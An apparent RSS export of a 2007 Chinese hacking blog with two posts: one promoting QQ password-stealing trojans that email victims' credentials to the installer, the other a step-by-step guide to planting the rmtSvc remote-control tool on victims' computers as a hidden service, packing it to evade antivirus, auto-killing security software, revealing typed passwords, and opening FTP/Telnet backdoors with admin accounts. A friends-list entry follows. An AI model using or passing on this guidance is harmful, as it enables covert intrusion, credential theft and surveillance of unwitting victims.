<P style="TEXT-INDENT: 2em">针对QQ的木马程序多不胜数，其中专门盗取QQ密码的也有一大堆，它们被偷偷地安装在用户的电脑中，随电脑启动而自动运行，如果用户使用QQ，那么其账号和密码就会被这些木马记录下来，并发送到木马安装者的邮箱中。前面已经介绍了两款通过登录窗口盗号的QQ木马，下面再介绍两款典型的。 </P>
<P style="TEXT-INDENT: 2em">第一款：极品QQ盗号2004 </P>
<P style="TEXT-INDENT: 2em">这是“极品QQ盗号”木马的最新版本。它的使用方法跟前面介绍的“密码使者”差不多，先再“设置”栏中填入接收QQ密码的邮箱地址和发送邮件的标题，然后把生成的盗号器偷偷地安装到别人的电脑里……这个木马声称可以避过主流的杀毒软件，盗取QQ最新版本的密码，即QQ2004和QQ2004奥运特别版的密码。 </P>
<P style="TEXT-INDENT: 2em">第二款：QQ间谍3.0 </P>
<P style="TEXT-INDENT: 2em">使用此木马软件时，点击工具条上的“服务端”，按照提示生成服务端程序，然后把它偷偷地传到别人的电脑中，当受害者不小心运行了它，木马就被种上了。这个木马不仅可以盗号，还能悄悄地在后台记录受害者的QQ聊天信息，并下载可执行文件实现远程升级和远程执行脚本程序。另外再注册之后，它还可以直接远程监控对方电脑上的QQ聊天记录。 </P>
<P style="TEXT-INDENT: 2em">利用木马软件盗取QQ密码，显然比用前面介绍的那些破解方法更有效率！不仅节省时间，而且成功率也高。但是，如何把木马程序的服务器端安装在用户的电脑中，这是一个费心思的事儿。另外，很多功能强大的木马程序都是需要花钱注册，才能使用其全部功能。因此，对于那些水平参差不齐的盗号者而言，要想玩转木马程序，还得费点劲。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007102785551664</comments>
    <slash:comments>8</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007102785551664</guid>
    <pubDate>Tue, 27 Nov 2007 20:55:51 +0800</pubDate>
    <dcterms:modified>2007-12-17T19:03:46+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[做黑客很简单，用IE浏览器实现远程控制]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007102785345281</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">听说过灰鸽子、冰河等可以实现远程控制，但你听说过IE也可以实现吗？不错，一款基于IE的新鲜工具——rmtSvc&amp;vIDC即可让微软</A>的IE成为一个超级黑客帮凶。本文除了将为你展现rmtSvc&amp;vIDC是如何基于IE远程控制肉鸡以外，更在如何“暗杀”杀毒软件</A>、攻击思路上有较强的指导性。 </P>
<P style="TEXT-INDENT: 2em">如果我问你IE能做什么？你的答案绝对不完整！IE可不仅仅能浏览网页。如果我再告诉你IE还能用来远程控制、远程传输、进程管理、代理服务，甚至远程开启Telnet、FTP服务等等呢？你一定觉得不可思议吧，有了rmtSvc&amp;vIDC，这一切皆有可能！ </P>
<P style="TEXT-INDENT: 2em">一、有IE 想黑就黑 </P>
<P style="TEXT-INDENT: 2em">简单点说，rmtSvc是一款集FTP、Telnet服务、Proxy服务以及vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机</A>进行控制。此工具和其它远程控制工具不同，它采用B/S结构（无需安装），用户可通过浏览器进行远程控制（我们的口号是：有IE，想黑就黑！）。 </P>
<P style="TEXT-INDENT: 2em">下面，笔者就以入侵控制的实例来为大家分别介绍rmtSvc常用功能的使用方法及技巧。解压下载后的压缩包，先别急着让rmtSvc.exe在目标机运行（未加壳的程序会遭到杀毒软件的查杀），笔者先告诉大家如何给源程序加壳从而避免被查杀吧（不然就没得玩了-_-|）。运行该软件，进入“选项”菜单，勾选“保留额外数据”，然后“打开文件”，选择源程序rmtSvc.exe后就会自动压缩了。 </P>
<P style="TEXT-INDENT: 2em">特别提醒：压缩后的rmtSvc.exe不会被杀毒软件查杀，而且文件体积会减少近50%（经过金山毒霸6增强版、KV2005、诺顿2005测试）,如果想进一步增强隐蔽性，请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》一文介绍的“超级捆绑”软件的使用方法。木马程序的欺骗发送本文就不作进一步讨论了。 </P>
<P style="TEXT-INDENT: 2em">二、武装RmtSvc “暗杀”杀毒软件 </P>
<P style="TEXT-INDENT: 2em">1．打开浏览器输入http://IP:port（其中IP为被控机的IP地址，port为rmtSvc的服务端口，默认为7778）。连接成功后将会看到如图1的欢迎登录画面，输入访问密码（默认为123456），就可以进行rmtSvc所支持的操作（如果之前已经连同msnlib.dll和webe目录都发给了对方，那么rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能）。 </P>
<P style="TEXT-INDENT: 2em">2．欢迎登录画面的上方为rmtSvc的系统</A>菜单，从左至右的功能依次为：Pview （进程查看）、Spy++（远程控制管理）、Proxy（启动或停止rmtSvc的代理服务）、vIDC（设置vIDCs的访问权限）、logoff（注销对rmtSvc登录）、Option（配置rmtSvc的运行参数）、About（rmtsvc欢迎/登录画面）。 </P>
<P style="TEXT-INDENT: 2em">3．第一次登录需进入rmtSvc的参数设置更改敏感信息（图2），这样才能保障其安全性。先在“Modify Password”修改rmtSvc访问密码，再在“Service Port”更改rmtSvc服务端口为任意一个4位不常用的端口(需要重启服务才会生效，建议设为高端端口）。然后将“Start Control、Stolen mode”选上，这样rmtSvc会自动安装为Windows</A>服务随机启动且服务为隐藏属性，这也就意味着在下次启动时，你可以继续控制目标机器。 </P>
<P style="TEXT-INDENT: 2em">4．接下来在“Start mode”选项中，设置rmtSvc运行后自动启动FTP和Telnet服务（另外还有Proxy、vIDCs映射等）。通过FTP可以方便地进行文件上传下载。再将“Auto install service”和“Forbid detaching Dll”选择上，这样每次程序运行时会自动检测rmtSvc服务是否已安装，如果没有安装则自动安装为服务（相当于自我修复功能）并释放一个DLL文件（可修改文件名，默认为inject.dll）,这是为了防止自动释放的未加壳的DLL被杀毒软件查杀，用户可以选择不释放DLL。手工将加壳后的DLL拷入到被控机的系统目录下，在释放DLL的名称处填入你加壳后的DLL名称。 </P>
<P style="TEXT-INDENT: 2em">高手传经：rmtSvc释放的DLL主要有以下用处：隐藏进程、模拟“Ctrl+Alt+Del”按键、显示密码框密码、监视rmtSvc运行情况。如果异常退出或被杀掉则会自动重新启动，将配置参数写入rmtSvc程序本身（强烈建议选择）。 </P>
<P style="TEXT-INDENT: 2em">5.接下来在“Killed Program”中，设定rmtSvc监视并自动杀掉的进程名称,如有多个进程，各个名称之间以逗号分隔。例如输入：PFW.exe,KAVSvc.exe就可以把金山毒霸和天网<A href="http://detail.zol.com.cn/firewall_index/subcate294_list_1.html">防火墙</A>关闭。 </P>
<P style="TEXT-INDENT: 2em">6.一切设置无误后，点击“Save”保存当前配置，在弹出的对话框中输入reg，将配置参数写入到注册表。输入self则是将配置参数写入该EXE文件自身，如果填写其它则会生成相应文件名的.exe的副本，并将配置参数写入此EXE副本。例如：输入c:\abc.exe，将在c盘根目录下生成一个abc.exe副本，并将配置参数写入此副本。 </P>
<P style="TEXT-INDENT: 2em">7.随后rmtSvc服务会重新启动运行。 </P>
<P style="TEXT-INDENT: 2em">高手传经：隐藏模式下才可以将配置参数写入EXE本身，如果没有保存，每次在rmtSvc正常退出时也会将配置参数写入EXE本身。 </P>
<P style="TEXT-INDENT: 2em">8.再次使用新设密码登录后，单击Pview进入“进程查看”页面，在这里将显示三个部分的信息：系统信息、进程/模块信息、CPU/<A href="http://detail.zol.com.cn/memory_index/subcate3_list_1.html">内存</A>使用信息。在页面的右边为进程模块显示区域，点击某个进程名则显示此进程的相关模块信息，点击“Kill It”按钮就可以杀掉该进程（需要注意的是进程列表不会实时自动刷新，用户必须手工刷新）。现在你的rmtSvc已经被武装到了牙齿，还等什么，可以出手了。 </P>
<P style="TEXT-INDENT: 2em">三、用IE控制过把瘾 </P>
<P style="TEXT-INDENT: 2em">把挡路的安全软件给“暗杀”后，接下来就可以趁对方不在时使用Spy++远程控制管理来远程控制机器了。当然在控制前我们需要将相关参数设置妥当，这样才能得到更好的控制效果。 </P>
<P style="TEXT-INDENT: 2em">1．在“Quality”显示效果中选择Good(好)，“Stretch”设置捕获图像的缩小比率80%。最后将“Cursor”选上，这样在捕获远程计算机屏幕时就会连同<A href="http://detail.zol.com.cn/mice_index/subcate32_list_1.html">鼠标</A>光标一起捕捉，以便用户知道当前鼠标光标位置。设置好后点击“Set”使上述三个参数生效。 </P>
<P style="TEXT-INDENT: 2em">2．接下来就可以尝试控制了。当远程桌面图像处于焦点状态（鼠标在图像区域内），你就可以直接敲击<A href="http://detail.zol.com.cn/keyboard_index/subcate33_list_1.html">键盘</A>发送按键信息，和你操作本地机器一样。但是对于输入大段的文本这是非常不方便的，因为你的每次按键动作都会作为一次HTTP请求发出，输入速度很慢。 </P>
<P style="TEXT-INDENT: 2em">如果你想输入大段文本，可以将鼠标选中Input输入框，然后输入你想要发送的文本，按下回车即可；如果选中了Crlf复选框，则在你输入的文本后面会自动加入回车换行。 </P>
<P style="TEXT-INDENT: 2em">3．但是在进行远程计算机登录时，有些机器可能无法通过Input输入框直接输入登录密码，只能通过模拟键盘输入登录密码。方法如下：通过鼠标直接点击桌面图像，系统会自动识别你的鼠标的单击、双击键信息。如果你在按下鼠标的同时按下了“Shift”、“Alt”或“Ctrl”键，系统也能自动识别。 </P>
<P style="TEXT-INDENT: 2em">4．为了更方便地控制远程桌面，可以将远程桌面图像设为自动刷新，这样就不会出现有动作发出而图像没有变化需要手工刷新的情况了。方法如下，勾选“Auto-refresh”项，在右边输入自动刷新间隔，默认为500ms。 </P>
<P style="TEXT-INDENT: 2em">高手传经：如果想知道远程被控机中密码框中的密码。则需要用到Password→Text项，在有密码框时此项会变为Text→Password。此时只要用鼠标左键点击远程桌面图像的密码输入框，则远程被控机密码框中的密码会被翻译成明文显示。如果你取消此项功能，点击Text→Password项即可，此时此项就会变为Password→Text。 </P>
<P style="TEXT-INDENT: 2em">5.如果要远程执行程序，选择Start下拉列表框的Run项，输入你要远程执行的文件名和参数即可，使用方法和Windows的开始菜单的运行命令一致。 </P>
<P style="TEXT-INDENT: 2em">如此这般，通过IE就能像操作本机一样控制目标机了。 </P>
<P style="TEXT-INDENT: 2em">四、FTP/Telnet 一个都不能少 </P>
<P style="TEXT-INDENT: 2em">远程控制似乎并不能让我们感到满足，那就再来开启对方的FTP/Telnet服务，彻底过把入侵瘾吧。 </P>
<P style="TEXT-INDENT: 2em">1．进入“FTP&amp;Telnet”菜单，点击FTP/Telnet服务旁边的“Run”就可以启动相关服务了。FTP/Telnet port：设置FTP/Telnet服务的端口，默认FTP为2121，Telnet为2323。Anonymous access：设置访问FTP服务的权限，是否允许匿名访问（enable），如果不允许则设置访问的用户名和密码。 </P>
<P style="TEXT-INDENT: 2em">2．另外，我们还要允许设置不同访问的账号，每个账号可以指定是否可写/可删除/可执行以及设置不同的FTP根目录。可以在FTP设置的文本输入框中输入多个访问账号信息，各个账号信息用回车换行分隔，账号信息格式如下： </P>
<P style="TEXT-INDENT: 2em"><CCID_NOBR>
<TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1>
<TBODY>
<TR>
<TD bgColor=#e6e6e6>
<P></P>
<P style="TEXT-INDENT: 2em"><CCID_CODE>[账号名] SP [密码] SP [访问权限] SP [允许访问的目录] CRLF</CCID_CODE></P></TD></TR></TBODY></TABLE></CCID_NOBR></P>
<P style="TEXT-INDENT: 2em">高手传经：设置PERMISSION（访问权限）时，0:仅仅只读，1:可写，3:可写并且可删除 7:可写可删除可执行。例如：[cytkk] sp [123456] sp [7] sp [c:] 就建立了一个拥有管理员权限，密码为123456的cytkk账户。 </P>
<P style="TEXT-INDENT: 2em">3．此时FTP账号信息仅仅写入注册表保存，不会保存到EXE中。 </P>
<P style="TEXT-INDENT: 2em">现在就可以利用FTP工具和Windows自带的Telnet工具进行登录和操作了，此时你想怎么玩就怎么玩吧！ </P>
<P style="TEXT-INDENT: 2em">到此，RmtSvc基本功能的使用大家就已经学会了，限于篇幅，它更多的功能就不在此一一举例了。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112007102785345281</comments>
    <slash:comments>6</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112007102785345281</guid>
    <pubDate>Tue, 27 Nov 2007 20:53:45 +0800</pubDate>
    <dcterms:modified>2007-12-17T19:04:23+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[我的密友]]></title>	
    <link></link>
    <description><![CDATA[<div>
			<a href="http://weiwei6830.blog.163.com/" target="_blank"><img src="http://ava.blog.163.com/photo/wJ4Vt96fvZsl8yKq1YQVWQ==/180425460071756579.jpg" border="0" />°-糖褁屋`</a>
			<a href="http://13510214937hong.blog.163.com/" target="_blank"><img src="http://ava.blog.163.com/photo/dw3pYJIvGz5Blwl_Pfygpw==/176484810397905205.jpg" border="0" />小懒猫</a>
			<a href="http://sharlyn.chan.blog.163.com/" target="_blank"><img src="http://ava.blog.163.com/photo/8BJWd452mKSjDbsnui9VDw==/227431781182212252.jpg" border="0" />  Kay.</a>
			<a href="http://shymax.blog.163.com/" target="_blank"><img src="http://ava.blog.163.com/photo/IRY96Ha4K9_xVgfD7d30Zw==/181551359978759767.jpg" border="0" />shy.</a>
			<a href="http://wx1meimei.blog.163.com/" target="_blank"><img src="http://ava.blog.163.com/photo/WY9GepngljHvUCPxY88YOA==/170010885934287835.jpg" border="0" />美美</a>
</div>]]></description>
    <guid isPermaLink="false">http://chaozanbk.blog.163.com/friends</guid>
    <pubDate>Tue, 1 Jan 2008 00:00:00 +0800</pubDate>
    <dcterms:modified>2008-01-01T00:00:00+08:00</dcterms:modified>
  </item>    
 </channel>
</rss>